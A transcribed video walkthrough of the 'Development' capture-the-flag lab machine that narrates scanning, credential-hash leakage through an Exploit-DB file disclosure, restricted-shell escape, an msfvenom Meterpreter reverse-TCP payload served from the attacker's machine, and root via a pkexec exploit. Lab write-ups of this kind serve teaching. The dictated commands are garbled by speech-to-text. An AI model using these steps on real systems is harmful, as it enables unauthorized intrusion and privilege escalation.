Hello guys, welcome back to Pentesting Club. Today we're going to solve another CTF challenge name called development. So what is the basic penetration testing methodologies we use here? So the basic penetration testing methodologies we use here: network discovery, enumeration, exploitation, privilege escalation, and capture the flag. So first open the terminal. So first we just type here as sudo su, enter our password. Then first we just type here as net discover minus I80. So first I identify my target machine. Then we just type here as later nmap minus 34 minus a is an aggressive scan and enter our targeted IP address. So I got the nmap result. One is available with SH, another one is available with ident, another one is available with NetBIOS, and another one is also available with NetBIOS. And this was hosted in the Windows ISS server. So there is no Apache server. And here also I have SBM client. So first we would like to try here as SBM client, SMB client, SMB client, enter our targeted address. So I enter my password. So I have got here as an access here. So just type here as SMB client, enter our targeted IP address 18.844. Then just type here as access, enter our password. Oh, there is double C, so just type here. So here is an access. Oh, no, not worked out also. So now we would like to try here. Why it not work out? So I would like to utilize here is in the forward way. So sometimes we'll make a mistake. That's it. Enter our password. So here access is denied. So you just type here as enough for Linux. Then you can identify here as somewhat a useful information. Then we would like to open the Firefox. So I just came to our targeted IP address and port. So you can see here, welcome to a development page. There are many projects in the box. So to view in the HTML pages, so you just copy these HTML pages. One, we are experimenting a host-based intrusion detection system. Report all false positive with a Patrick and good tag. So here also we would like to look here admin Patrick intern OSSec. So we would like to write down all these usernames here. So first come back here. Username is a Patrick and intern, then OSSec, then OSSECR, that's it. Then OSSECM. So these are the possible usernames. Okay, that's great. Now let's come back here. We would like to look here as HTML pages. So we have got the HTML pages. So we just copy this one, come back here. So we just type here as clear. Now I just type here as a cut. Let it paste to this HTML pages. So I have got it here. So you are not looking everything here. Once you go with the directory buster, that will not give you an answer also. If you want, let me, I can show you here. So this is an instruction based detection system. So there it will be identified automatically and that will not give you a right result. You can see that was closed. That's it. So I just type here. Now we have got here as HTML pages. Now let me just type here as gun, then HTML pages. So I would like to present a mode for a silent minus S HTML pages. Then I would like to print AWK. Then we would like to print here is print. I would like to put here as $9. That's it. We would like to look here. So what else it is? It was only will be a display here. So that's it. So now we would like to close this. So again, so this machine is like, I just type here as ping. So it never come. So let me just type here as. So again, I would like to resume this. So sometimes this machine working with very hard. So it will be automatically will be suspended. Now we would like to restart here. So we need to try to do very clearly with this. Now let's come back here. Now we would like to try here is it's still ongoing. So let it be. So that was come. Now we just try here as again with the cut. That's game. Now we just try here is cut. So now it was game everything. Now we just try here is something. Now I just type here as clear. Now I would like to use here as a Python. Now we just write as some program here, import a request. Now we just try here as with open. We just try here as a pages. Then we just give here is as f. Now we just write here as a for like in f read lines. I would like to read the lines here. What is the read? I would like to print that. Print as go for a retrieving. And I just present here as line dot is strip. Then let's close this. There. I need to present the URL. So our URL equal to let you just paste it here. HTTP and our targeted IP address 192.168.18.a44 and 8080. That's it. Now we would like to try here as plus line dot is strip. That's it. HTTP detected. So okay, here is an error which I was made. So just copy, paste it. Okay, you just write here is URL equal to HTTP and terabyte target IP address 18.44 is 8080. Then let's paste it. Now let me I just put here is airline.strip. That's it. So it was error, so I just quit here. Oh, sorry, just type here as exit. So that was exit. So I want to write very clearly. So now we would like to write here is Python import a requesters. Now we just write here as with open, just write here as a pages. Then present here is R as F. Now here we will just write here as for line in F dot read lines. So we need to read the lines. Now we just type here as print. Then we just type here as retrieving line dot strip. Then just close this. That's great. Now I just type here as URL. Now I just enter our target IP address 192.168.18.844 is 8080. Then let's close this. Then you just write here as line dot strip. That's it. Now we need to print this. We need to print the requesters dot get URL dot text. That's it. No, what is the error here? So here we not yet get a print out the results. So it was a waste of time to print out here as a result. So I just quit here. So we just type it as exit. So when we go with the Python that not work out, now we would like to try here. So here we would like to utilize here with the development.html only. So let's come back here. So let me just use as development.html. So security by obscurity. So it have a lot of things to study here. So once we would like to look here is so development.html, that's it. Then error.html. So once we would like to look here, security by obscurity is one of the worst ways to defend a cyber attack. This assumes the advisor is not smart enough able to detect the weak points in a corporate network. An example, a security obscurity is a local web page for an instant for IT administrator and test of backdoor application and remote management sometimes without a project team knowing. So we would like this. So we would like to look the pesos. So what else I have selected that only will come. So we would like to look here. Uh, you try here as development as secret page. So we would like to visit this. So just copy, come back here. So just enter development as secret page. Welcome to the development secret page. Please drop backtext PHP page to get to know development head better. But beware of this site, it is still under construction. Please bear with us. This is a property good tech. All rights are reserved. Now we would like to look here as a patrick.php. So I have successfully logged in here. Welcome to my profile page. I'm Patrick, the head of the development in Good Tech. I have previously worked in the enterprise technologies. I joined a Good Tech 2 years ago and then manager of development. I had a two team, one that does enterprise architecture and in-house development team. As long as you are willing to try harder, then it will always stay further. Set here. Now we would like to utilize here uh, working with this. So that's it. Now we would like to come back. So I would like to copy this one. I would like to go with as a directory master. So let me clear. We just utilize here as directory master. Let paste it. So in the directory master, what we can get here, we would like to look here. So it not go for a crawler. So that's a, a total mistake here. So now I would like to utilize this as a curve. So it not work out. So once you have tried this as a directory buster, the machine is going to kick you out. So that you don't need to try again this as a directory buster. So I would like to restart this. So if you try as this one, the institution of the detection machine that will kicking you out. So you don't try again with this directory buster. So let me close this one. So once this is load, now let me would like to try here as something. Now let me would like to look this. Yes, it's game. Now we would like to try here is car that was game. Tryharder.html, uploads.html. So let it you just keep all these things. So just come back here. Try harder.html. Look around and try harder. So we would like to look the pesos. Okay, nothing else. Now we would like to try here as index.html. No, HTML pages are default development. So I would like to put as only a development. So we would like to go here as development. So there I have got it here. Under a development, we have variety of projects. A test.pcap is a simple bash script that allows a director a comfort of his desk and routinely. We would like to get this a test.pcap. So come back. So now come back here. So just write here. You just type here as wget http enter your targeted IP address 192.168.18.44 and you just type here as 8080 and test.pcap. That's it. We have got it here. Now I just type here as a wireshark test.pcap. That's it. Now let me would like to work this pcap. Now we would like to open this. So we would like to look this here where development create as a directory. Here we would like to look here as something is with the one.php. So we would like to look here as an hypertext markup language. It's not at get here. So we would like to copy this one. Copied. Now let's come back here. So let we just paste it here. Now we just need to change our targeted IP address here. So 18.44. That's it. So developments secret page and directors.php.1. So director, there is nothing for you as immediate action. So we have got to this one. So just click on OK. So hi director, this is a test page I provided with the directory with I. Then what we would like to do here is we know director is busy and hence need to update delivered in timely manner. Patrick and I will routinely update the page with a pop-up with the details. There is nothing important regards with the Patrick, head of the development network. So we try to log out. So where this is have been logged out here. Now we would like to look this here. So we try to utilize here a local file inclusion. We have got this here. So here is I just like to ask so it not work out here for this. So you just type here as ID1. So even you can do here as an SQL injections or many things. So I would like to try here is so I would like to utilize here as exploit DB. So I would like to visit this exploit DB. We would like to look this exploits. So we would like to look here as exploits 7344. So this is a simple text file login script. So I would like to utilize here is slog users.txt. So just copy this one, come back here, enter your targeted IP address, development secret page, then you just paste here as slog users.txt. So I have found this admin intern Patrick all the passwords. So I would like to open new tab. You just type here as MD5 hash cracker. So I would like to utilize here is online this one. So let it paste it here. So come back here. So just entirely just copy. Come back, let it paste it here. So where it have intern, I would like to delete until this as Patrick. Then let me just go with as Q. Then let me just try here. So let me just crack here all the passwords. Now try to verify and click on crack the hashes. So I have got it here is one of the one. So let's come back here. So I know the intel. So we already know this or as such. We would like to crack the password of this one. So now we would like to head to the SH. So let's come back here. So there is not required this. So just close this, come back here. So we just type here as SH and username one is as intern. So where I have copied before, so just copy this one, let it paste it, enter our target. IP address 192.168.18.44. Let us yes. Then the password is this one. Where is this intern password? This one. So just copy, come back here, let it paste it. Then you have successfully logged in here. Now, what we would like to do here is, now we just try here as, we just type here as export tab equal to x tab. Now just it's unknown syntax. So okay, plus minus here. We just write there as cat a local.txt. So it's unknown syntax. So how we would like to overcome with this? Let me, I just write here as echo. We would like to try here as a print uh, PC. Let me I just write here as a PCPL Alex. Then let we just try here is Python. Let me try here. It's forbidden. You have no warnings or kick out. The incident has been reported. So this was an institution and detection. So we have somewhat issues to look it out this one. Now we just type here as echo os dot a system. Then we just type here as a bin bash. Let I would like to try here that. Now I have that again. So now I just type here as export tab equal to x tab. Now I just type clear. Now I just type plus minus here. Now I just type here as cat a local.txt. I have got it here. Congratulations on onboarding user of the shell. That's great. Now let we would like to look this here. Now I just type here as cat a work.txt. Tell Patrick that shout box is not working. We need to revert the old method to update a David about a shout box. For new, we will the old director's landing page. So Patrick start for the third year in the company, attending the meeting and discuss a password policy should be a relooked at. So once it was a relooked, now we would like to utilize here. Now we just type here as cd home plus minus here cd a Patrick plus minus here. And I just type here as cat a password.txt. So welcome to the password portal. Intruder alert. To a root me, you need to try harder. Okay, no worries. We just type here as cat access.txt. Here access panel login password access is denied, you must try harder. Now just type here as plus minus here. That's it. So there is nothing else. So we don't like to go as uh, this one. Now just type here as clear. Now go to an attempt directory. So I would like to create as with the payload MSF console. So sorry, MSF Vina, a payload for uh, Linux. There, meter printer. Then you just type here as reverse underscore TCP. There, you just type here as lcos equal to enter your target. Type here as 192.168.18.44, and you just type here as lcode equal to. I would like to put as a 4444. No, I don't want to put 4444. I just put 7890. Then file type is an ELF file. Output as I would like to get as linux.elf. That's it. So let it will create this a file. Now we would like to go further. So invalid payload. So Linux meter Peter. Okay, meter Peter. So it was an invalid payload means. So let come back as a reverse underscore TCP lhost DLF. So let we just create here. So why it was error? So I have forgotten to give. Here is x64 x64 meter Peter reverse underscore TCP. Now let it create here. Yes, linux.elf that was created. Now you would like to look here as your config that was kept. Now your IP address is 139. So let me come back here. So now you just type here as python minus m http dot a server. That's okay. Now let's come back here. Now we would like to take this our Linux one. So just type here as wg get http and your target IP address 192.168.18.139. Then you just type here as 8000. Now you just type here as linux.elf. So where I have got this as linux.elf. So you just write here as chmod plus x linux.elf. That's correct. Now let's come back here. So I just quit here. Now we just quit this. So I just type here as MSF Console. So let it launch this MSF Console. So where MSF Console is launched. Now let's wait for this. So now we would like to utilize here is use exploit multi-handler. Multi-handler. Now just type here as set payload. So what is the payload which was used? Linux x64 meter Peter reverse underscore TCP. Oh, I have made a mistake. Big mistake here is my targeted IP address I have uh, changed. So I just type here as remove as a linux.elf. That's great. So I have made a mistake here is I need to enter here is 139. So that is the total big mistake it lead. So let it generate here. Oh, sorry. I would like to quit here. So just type clear. remove a linux.elf. Now just type here. So you need to enter your Kali Linux IP address here. So I have mistaken this one. That now it was a created. Now let me just type here as a python minus m http dot a server, and it is in 80. Now let's come back here. Now we just come back here. So where I have got here, now you just type here as Linux, so that's clear. Now let's come back here. So a set payload is now we just copy this meter set payload which I was set the payload. Now what we would like to do here is now you just type here as show options, where you just type here as set lhost enter your targeted IP address 192.168.18.139 and set L port is 7890, where which you have put here as 7890. That's great. Now we just type here as a run. When you go for run, we just type here as a linux.elf. Now let's come back here, run. Now that meter will be start here. Now it was started. Now just execute this one. Now here I have got a meter reverse shell. Now we just type here as a background. Now we just type here as a search suggester. So you just type here as use 0. Now you just type here as set a session 1. Now just type here as run. Now this will be run for exploiting all. So let it run all those things here. So once this is done, we would like to get directly as a root release access. So it may take a little bit time. So this is a hard test machine to try here. So once you ping, that machine will be shut down. Once you do the directory buster, it will be done. Once you crawl the website, you are be kicked out. So you need to restart the machine again. So this is totally a disgusting thing. So I have found here is so I would like to use this this one exploit Linux CVM PKEX. So just copy this one. So once this is done, now let's wait. So we have copied this one. So if the error is came, you don't need to worry here. So now we just type here as use the exploit which I was copied, that was done here. Now I just type here as a show options. Now we just need to put here as lhost is correct. And set a session 1. And I just need to put a set L port equal to 8888. And I just type here as again as set lhost 192.168.18.139. That's great. Now you just type a run. That's great. Now we are going to get a root privilege access from this. So just come back here. So now a meter session is open here. Now let's wait here. Just type here as shell. Let's wait. So where I have got directly in the shell, now just type ID. We are in the root. So just type here as which Python you got it here. So just type here as Python -c import a pdy span bin bash. So where I have got it here a root. So just type here as export tab equal to x tab. Now just type here as clear. Now just type list minus a. Now we just type here as cd a root list minus a. Now we just type here as cat proof.txt. Congratulations on rooting this development. That's it. So you try your own guys. Thank you guys for watching and keep smiling.